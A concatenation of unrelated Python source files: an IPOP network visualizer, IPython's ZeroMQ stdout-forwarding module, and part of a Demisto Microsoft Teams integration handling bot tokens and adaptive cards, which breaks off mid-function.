app.run(host='127.0.0.1', port=port, debug=True)
|
visualizer.py
|
#!/usr/bin/env python
# pacman -S tk
from threading import Thread # listener thread
from math import sin,cos,pi # gui positioning
import hashlib # calculating uid
import time # ttl and refresh
import tkinter # gui library
import sys # arguments and exit
import socket # listener
import json # decoding packets
# canvas object - graphical user interface tool
class Canvas(object):
# initialize canvas
def __init__(self, width, height, margin, title):
# canvas constants
self.WIDTH = width
self.HEIGHT = height
self.MARGIN = margin
self.MID_X = self.WIDTH / 2
self.MID_Y = self.HEIGHT / 2
self.RADIUS = min(self.MID_X, self.MID_Y) - self.MARGIN
# create canvas
self.tk = tkinter.Tk()
self.tk.title(title)
self.tk.configure(background='black')
self.tk.resizable(0,0)
self.canvas = tkinter.Canvas(self.tk, width=self.WIDTH, height=self.HEIGHT, bg='black')
self.canvas.pack()
# canvas operators
def draw_circle(self, x, y, r, f=None):
self.canvas.create_oval(x-r,y-r,x+r,y+r, outline='black', width=1, fill=f)
def draw_line(self, x_i, y_i, x_j, y_j, f=None):
self.canvas.create_line(x_i, y_i, x_j, y_j, fill=f, width=1)
def draw_text(self, x, y, t):
self.canvas.create_text(x, y, text=t, fill='white', justify=tkinter.CENTER)
def update(self):
self.tk.update()
def clear(self):
self.canvas.delete('all')
# network object - state of the network
class Network(object):
class Node(object):
def __init__(self, x, y, n_x, n_y, ip4):
self.name = ip4.split('.')[3]
self.ip4 = ip4
self.x = x
self.y = y
self.n_x = n_x
self.n_y = n_y
self.state = 0
self.links = {
"successor": [],
"chord": [],
"on_demand": [],
"inbound": []
}
def __init__(self, nr_nodes, ip4_mask_addr):
self.uid_nid_table = {} # uid to node index mapping
self.uid_ip4_table = {} # uid to ipv4 mapping
self.nodes = [] # list of nodes indexed by node index
# create nodes (sorted by uid)
for i in range(nr_nodes):
ip4 = ip4_mask_addr + str(i // 256) + "." + str(i % 256)
uid = hashlib.sha1(bytes(ip4,'utf-8')).hexdigest()[:40]
self.uid_ip4_table[uid] = ip4
sorted_uid = sorted(self.uid_ip4_table.keys())
for i in range(nr_nodes):
uid = sorted_uid[i]
ip4 = self.uid_ip4_table[uid]
self.uid_nid_table[uid] = i
x = canvas.RADIUS * cos(i*2*pi/nr_nodes) + canvas.MID_X
y = canvas.RADIUS * sin(i*2*pi/nr_nodes) + canvas.MID_Y
n_x = (20 + canvas.RADIUS) * cos(i*2*pi/nr_nodes) + canvas.MID_X
n_y = (20 + canvas.RADIUS) * sin(i*2*pi/nr_nodes) + canvas.MID_Y
self.nodes.append(Network.Node(x, y, n_x, n_y, ip4))
# listener thread - listens for network state and updates the data accordingly
def listener(protocol, recv_ipv4, recv_port):
# initialize listener socket
if protocol == "tcp":
recv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
recv_sock.connect((recv_ipv4, recv_port))
else:
recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recv_sock.bind((recv_ipv4, recv_port))
while runnable:
msg = {}
if protocol == "tcp":
# stream head
stream = recv_sock.recv(6)
while len(stream) < 6:
stream += recv_sock.recv(6 - len(stream))
head = int(stream.decode("utf8")[1:5])
# stream data
data = ""
while head != 0:
stream = recv_sock.recv(head)
data += stream.decode("utf8")
head -= len(stream)
else:
gram = recv_sock.recv(8192)
data = gram.decode("utf8")
msg = json.loads(data)
print(network.uid_ip4_table[msg["uid"]])
node_index = network.uid_nid_table[msg["uid"]]
network.nodes[node_index].state = int(time.time())
for con_type in ["successor", "chord", "on_demand", "inbound"]:
network.nodes[node_index].links[con_type] = [network.uid_nid_table[x] for x in msg[con_type]]
def main():
global runnable
global canvas
global network
# parse arguments
try:
protocol = str(sys.argv[1])
recv_ipv4 = str(sys.argv[2])
recv_port = int(sys.argv[3])
nr_nodes = int(sys.argv[4])
canvas_sz = int(sys.argv[5])
except:
print('usage: ' + sys.argv[0] + ' <protocol> <recv_ipv4> <recv_port> <nr_nodes> <canvas_sz>')
sys.exit()
# hard-coded arguments
ip4_addr = "172.31.0.0"
ip4_mask = 16
ip4_mask_addr = "172.31."
# set runnable state; create canvas and graph objects
runnable = True
canvas = Canvas(canvas_sz, canvas_sz, 50, 'IPOP Network Visualizer')
network = Network(nr_nodes, ip4_mask_addr)
# launch listener
thread_listener = Thread(target=listener, args=(protocol, recv_ipv4, recv_port,))
thread_listener.start()
# main loop
while True:
nr_online_nodes = 0
nr_successor_links = 0
nr_chord_links = 0
nr_on_demand_links = 0
# draw links
for node in network.nodes:
if int(time.time()) < node.state + 10: # assumed online
for peer in node.links["on_demand"]:
canvas.draw_line(node.x, node.y, network.nodes[peer].x, network.nodes[peer].y, 'orange')
nr_on_demand_links += 1
for peer in node.links["chord"]:
canvas.draw_line(node.x, node.y, network.nodes[peer].x, network.nodes[peer].y, 'white')
nr_chord_links += 1
for peer in node.links["successor"]:
canvas.draw_line(node.x, node.y, network.nodes[peer].x, network.nodes[peer].y, 'yellow')
nr_successor_links += 1
# draw nodes
for node in network.nodes:
if int(time.time()) < node.state + 10: # assumed online
canvas.draw_circle(node.x, node.y, 5, 'green')
nr_online_nodes += 1
else:
canvas.draw_circle(node.x, node.y, 5, 'red')
canvas.draw_text(node.n_x, node.n_y, node.name)
canvas.draw_text(16, 10, "ipv4")
canvas.draw_text(20, 25, "nodes")
canvas.draw_text(34, 40, "successors")
canvas.draw_text(22, 55, "chords")
canvas.draw_text(34, 70, "on-demand")
canvas.draw_text(120, 10, ip4_addr + "/" + str(ip4_mask))
canvas.draw_text(120, 25, nr_online_nodes)
canvas.draw_text(120, 40, nr_successor_links)
canvas.draw_text(120, 55, nr_chord_links)
canvas.draw_text(120, 70, nr_on_demand_links // 2)
canvas.update()
canvas.clear()
time.sleep(0.1)
if __name__ == "__main__":
main()
|
iostream.py
|
# coding: utf-8
"""Wrappers for forwarding stdout/stderr over zmq"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import atexit
from binascii import b2a_hex
import os
import sys
import threading
import warnings
from io import StringIO, UnsupportedOperation, TextIOBase
import zmq
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from jupyter_client.session import extract_header
from ipython_genutils import py3compat
from ipython_genutils.py3compat import unicode_type
#-----------------------------------------------------------------------------
# Globals
#-----------------------------------------------------------------------------
MASTER = 0
CHILD = 1
#-----------------------------------------------------------------------------
# IO classes
#-----------------------------------------------------------------------------
class IOPubThread(object):
"""An object for sending IOPub messages in a background thread
Prevents a blocking main thread from delaying output from threads.
IOPubThread(pub_socket).background_socket is a Socket-API-providing object
whose IO is always run in a thread.
"""
def __init__(self, socket, pipe=False):
"""Create IOPub thread
Parameters
----------
socket: zmq.PUB Socket
the socket on which messages will be sent.
pipe: bool
Whether this process should listen for IOPub messages
piped from subprocesses.
"""
self.socket = socket
self.background_socket = BackgroundSocket(self)
self._master_pid = os.getpid()
self._pipe_flag = pipe
self.io_loop = IOLoop()
if pipe:
self._setup_pipe_in()
self._local = threading.local()
self._events = {}
self._setup_event_pipe()
self.thread = threading.Thread(target=self._thread_main)
self.thread.daemon = True
def _thread_main(self):
"""The inner loop that's actually run in a thread"""
self.io_loop.start()
self.io_loop.close(all_fds=True)
def _setup_event_pipe(self):
"""Create the PULL socket listening for events that should fire in this thread."""
ctx = self.socket.context
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
_uuid = b2a_hex(os.urandom(16)).decode('ascii')
iface = self._event_interface = 'inproc://%s' % _uuid
pipe_in.bind(iface)
self._event_puller = ZMQStream(pipe_in, self.io_loop)
self._event_puller.on_recv(self._handle_event)
@property
def _event_pipe(self):
"""thread-local event pipe for signaling events that should be processed in the thread"""
try:
event_pipe = self._local.event_pipe
except AttributeError:
# new thread, new event pipe
ctx = self.socket.context
event_pipe = ctx.socket(zmq.PUSH)
event_pipe.linger = 0
event_pipe.connect(self._event_interface)
self._local.event_pipe = event_pipe
return event_pipe
def _handle_event(self, msg):
"""Handle an event on the event pipe"""
event_id = msg[0]
event_f = self._events.pop(event_id)
event_f()
def _setup_pipe_in(self):
"""setup listening pipe for IOPub from forked subprocesses"""
ctx = self.socket.context
# use UUID to authenticate pipe messages
self._pipe_uuid = os.urandom(16)
pipe_in = ctx.socket(zmq.PULL)
pipe_in.linger = 0
try:
self._pipe_port = pipe_in.bind_to_random_port("tcp://127.0.0.1")
except zmq.ZMQError as e:
warnings.warn("Couldn't bind IOPub Pipe to 127.0.0.1: %s" % e +
"\nsubprocess output will be unavailable."
)
self._pipe_flag = False
pipe_in.close()
return
self._pipe_in = ZMQStream(pipe_in, self.io_loop)
self._pipe_in.on_recv(self._handle_pipe_msg)
def _handle_pipe_msg(self, msg):
"""handle a pipe message from a subprocess"""
if not self._pipe_flag or not self._is_master_process():
return
if msg[0] != self._pipe_uuid:
print("Bad pipe message: %s", msg, file=sys.__stderr__)
return
self.send_multipart(msg[1:])
def _setup_pipe_out(self):
# must be new context after fork
ctx = zmq.Context()
pipe_out = ctx.socket(zmq.PUSH)
pipe_out.linger = 3000 # 3s timeout for pipe_out sends before discarding the message
pipe_out.connect("tcp://127.0.0.1:%i" % self._pipe_port)
return ctx, pipe_out
def _is_master_process(self):
return os.getpid() == self._master_pid
def _check_mp_mode(self):
"""check for forks, and switch to zmq pipeline if necessary"""
if not self._pipe_flag or self._is_master_process():
return MASTER
else:
return CHILD
def start(self):
"""Start the IOPub thread"""
self.thread.start()
# make sure we don't prevent process exit
# I'm not sure why setting daemon=True above isn't enough, but it doesn't appear to be.
atexit.register(self.stop)
def stop(self):
"""Stop the IOPub thread"""
if not self.thread.is_alive():
return
self.io_loop.add_callback(self.io_loop.stop)
self.thread.join()
if hasattr(self._local, 'event_pipe'):
self._local.event_pipe.close()
def close(self):
self.socket.close()
self.socket = None
@property
def closed(self):
return self.socket is None
def schedule(self, f):
"""Schedule a function to be called in our IO thread.
If the thread is not running, call immediately.
"""
if self.thread.is_alive():
event_id = os.urandom(16)
while event_id in self._events:
event_id = os.urandom(16)
self._events[event_id] = f
self._event_pipe.send(event_id)
else:
f()
def send_multipart(self, *args, **kwargs):
"""send_multipart schedules actual zmq send in my thread.
If my thread isn't running (e.g. forked process), send immediately.
"""
self.schedule(lambda : self._really_send(*args, **kwargs))
def _really_send(self, msg, *args, **kwargs):
"""The callback that actually sends messages"""
mp_mode = self._check_mp_mode()
if mp_mode != CHILD:
# we are master, do a regular send
self.socket.send_multipart(msg, *args, **kwargs)
else:
# we are a child, pipe to master
# new context/socket for every pipe-out
# since forks don't teardown politely, use ctx.term to ensure send has completed
ctx, pipe_out = self._setup_pipe_out()
pipe_out.send_multipart([self._pipe_uuid] + msg, *args, **kwargs)
pipe_out.close()
ctx.term()
class BackgroundSocket(object):
"""Wrapper around IOPub thread that provides zmq send[_multipart]"""
io_thread = None
def __init__(self, io_thread):
self.io_thread = io_thread
def __getattr__(self, attr):
"""Wrap socket attr access for backward-compatibility"""
if attr.startswith('__') and attr.endswith('__'):
# don't wrap magic methods
super(BackgroundSocket, self).__getattr__(attr)
if hasattr(self.io_thread.socket, attr):
warnings.warn("Accessing zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
return getattr(self.io_thread.socket, attr)
super(BackgroundSocket, self).__getattr__(attr)
def __setattr__(self, attr, value):
if attr == 'io_thread' or (attr.startswith('__' and attr.endswith('__'))):
super(BackgroundSocket, self).__setattr__(attr, value)
else:
warnings.warn("Setting zmq Socket attribute %s on BackgroundSocket" % attr,
DeprecationWarning, stacklevel=2)
setattr(self.io_thread.socket, attr, value)
def send(self, msg, *args, **kwargs):
return self.send_multipart([msg], *args, **kwargs)
def send_multipart(self, *args, **kwargs):
"""Schedule send in IO thread"""
return self.io_thread.send_multipart(*args, **kwargs)
class OutStream(TextIOBase):
"""A file like object that publishes the stream to a 0MQ PUB socket.
Output is handed off to an IO Thread
"""
# The time interval between automatic flushes, in seconds.
flush_interval = 0.2
topic = None
encoding = 'UTF-8'
def __init__(self, session, pub_thread, name, pipe=None):
if pipe is not None:
warnings.warn("pipe argument to OutStream is deprecated and ignored",
DeprecationWarning)
# This is necessary for compatibility with Python built-in streams
self.session = session
if not isinstance(pub_thread, IOPubThread):
# Backward-compat: given socket, not thread. Wrap in a thread.
warnings.warn("OutStream should be created with IOPubThread, not %r" % pub_thread,
DeprecationWarning, stacklevel=2)
pub_thread = IOPubThread(pub_thread)
pub_thread.start()
self.pub_thread = pub_thread
self.name = name
self.topic = b'stream.' + py3compat.cast_bytes(name)
self.parent_header = {}
self._master_pid = os.getpid()
self._flush_pending = False
self._io_loop = pub_thread.io_loop
self._new_buffer()
def _is_master_process(self):
return os.getpid() == self._master_pid
def set_parent(self, parent):
self.parent_header = extract_header(parent)
def close(self):
self.pub_thread = None
@property
def closed(self):
return self.pub_thread is None
def _schedule_flush(self):
"""schedule a flush in the IO thread
call this on write, to indicate that flush should be called soon.
"""
if self._flush_pending:
return
self._flush_pending = True
# add_timeout has to be handed to the io thread via event pipe
def _schedule_in_thread():
self._io_loop.call_later(self.flush_interval, self._flush)
self.pub_thread.schedule(_schedule_in_thread)
def flush(self):
"""trigger actual zmq send
send will happen in the background thread
"""
if self.pub_thread.thread.is_alive():
# wait for flush to actually get through:
self.pub_thread.schedule(self._flush)
evt = threading.Event()
self.pub_thread.schedule(evt.set)
evt.wait()
else:
self._flush()
def _flush(self):
"""This is where the actual send happens.
_flush should generally be called in the IO thread,
unless the thread has been destroyed (e.g. forked subprocess).
"""
self._flush_pending = False
data = self._flush_buffer()
if data:
# FIXME: this disables Session's fork-safe check,
# since pub_thread is itself fork-safe.
# There should be a better way to do this.
self.session.pid = os.getpid()
content = {u'name':self.name, u'text':data}
self.session.send(self.pub_thread, u'stream', content=content,
parent=self.parent_header, ident=self.topic)
def write(self, string):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
# Make sure that we're handling unicode
if not isinstance(string, unicode_type):
string = string.decode(self.encoding, 'replace')
is_child = (not self._is_master_process())
# only touch the buffer in the IO thread to avoid races
self.pub_thread.schedule(lambda : self._buffer.write(string))
if is_child:
# newlines imply flush in subprocesses
# mp.Pool cannot be trusted to flush promptly (or ever),
# and this helps.
if '\n' in string:
self.flush()
else:
self._schedule_flush()
def writelines(self, sequence):
if self.pub_thread is None:
raise ValueError('I/O operation on closed file')
else:
for string in sequence:
self.write(string)
def _flush_buffer(self):
"""clear the current buffer and return the current buffer data.
This should only be called in the IO thread.
"""
data = u''
if self._buffer is not None:
buf = self._buffer
self._new_buffer()
data = buf.getvalue()
buf.close()
return data
def _new_buffer(self):
self._buffer = StringIO()
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
from traceback import format_exc
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
ENTRY_FOOTER: str = 'From Microsoft Teams'
INCIDENT_NOTIFICATIONS_CHANNEL = 'incidentNotificationChannel'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for given date. If no date, return current.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
'Unknown': 0,
'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
Turns URL to markdown hyper-link
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
def process_tasks_list(data_by_line: list) -> dict:
"""
Processes tasks list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
"""
Processes incidents list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('bot_access_token', '')
valid_until: int = integration_context.get('bot_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('graph_access_token', '')
valid_until: int = integration_context.get('graph_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph', params: Optional[Dict] = None
) -> Union[dict, list]:
"""A wrapper for requests lib to send our requests and handle requests and responses better
Headers to be sent in requests
Args:
method (str): any restful method
url (str): URL to query
json_ (dict): HTTP JSON body
api (str): API to query (graph/bot)
params (dict): Object of key-value URL query parameters
Returns:
Union[dict, list]: The response in list or dict format.
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL,
params=params,
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel or remove user from channel return 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
adi_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
demisto.results({
'ContentsFormat': formats['json'],
'Type': entryTypes['note'],
'HumanReadable': adi_health_human_readable + mirrored_channels_human_readable,
'Contents': adi_health_human_readable + mirrored_channels_human_readable
})
def validate_auth_header(headers: dict) -> bool:
"""
Validated authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
scehma: str = parts[0]
jwt_token: str = parts[1]
if scehma != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
decoded_payload: dict = jwt.decode(jwt_token, verify=False)
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = get_integration_context()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
